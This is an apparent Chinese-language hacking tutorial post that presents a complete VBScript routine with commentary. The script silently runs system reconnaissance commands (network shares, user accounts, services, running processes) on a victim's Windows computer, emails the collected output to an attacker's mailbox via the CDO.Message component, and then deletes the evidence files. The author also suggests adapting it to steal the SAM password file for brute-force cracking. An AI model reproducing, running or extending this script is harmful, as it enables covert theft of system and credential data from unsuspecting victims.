大家好啊,又见面啦,会不会想起我啦?我可是很想大家的
写vb脚本也写啦几篇啦,不知道大家有收获没拉
我还是希望大家学到多多的东西啦
这篇带来的是关于cdo.message组建的利用的,目的是为了上传文件啦,嘿嘿ie,看来我说啦很多废话
具体的功能还是看下面代码的分析吧!
sub send_email(myaccount,mypassword,toemail,emailtopic,emailbody,emailattach) '自定义一个过程括号里面的是形参
dim cmdnum,i '初始化两个变量
set objshell=createobject("wscript.shell")
set email=createobject("cdo.message")
cmdnum=array("net share","ipconfig /all","net user","net start","tasklist /svc") '定义一个数组,里面的元素即为要收集的东西
for i=0 to 4 '循环,数组的下标是从0开始,因此只能为4
objshell.run("cmd /c "&cmdnum(i)&">>c:\"&i&".txt"),vbhide '执行相应命令,并把结果存放到指定的文件里
emailattach="c:\"&i&".txt"
youid=split(myaccount,"@",-1,1) '以@为分界符把变量myaccount分割掉,分别存储在youid数组里
ms_space="http://schemas.microsoft.com/cdo/configuration/" '此地方不要修改,没什么问题(说白啦我也不知道这里为什么要这样)
email.from=myaccount '定义邮件从哪里发送
email.to=toemail '定义目标地址
email.subject=emailtopic '定义邮件主题
email.textbody=emailbody '定义主体内容
with email.configuration.fields 'with用在这里是省掉没必要的操作
.item(ms_space&"sending")=2 '发信端口
.item(ms_space&"smtpserver")="smtp."&youid(1) '定义邮箱发送服务器
.item(ms_space&"smtpserverport")=25 '定义smtp服务器端口
.item(ms_space&"smtpauthenticate")=1 '应该是组件cdo的一个认证方式
.item(ms_space&"sendusername")=youid(0)
.item(ms_space&"sendpassword")=mypassword
.update
end with
if emailattach <> "" then '如果附件不为空
email.addattachment emailattach '为邮件添加附件
end if
email.send
set email=nothing
if err then '如果发信不成功
err.clear '清除错误提示
end if
objshell.run("cmd /c del "&emailattach),vbhide
next
end sub
代码处你也可以自行修改发挥,比如上传受害者电脑里的sam文件啦,然后跑lcx,来个暴力破解啊
其实这篇文章叫邮箱的另类利用,我心里实属还有点内疚,因为这根本就算不上什么另类啦
高手见啦,肯定不户瞟一眼的
哎,实属我技术那个菜啦...........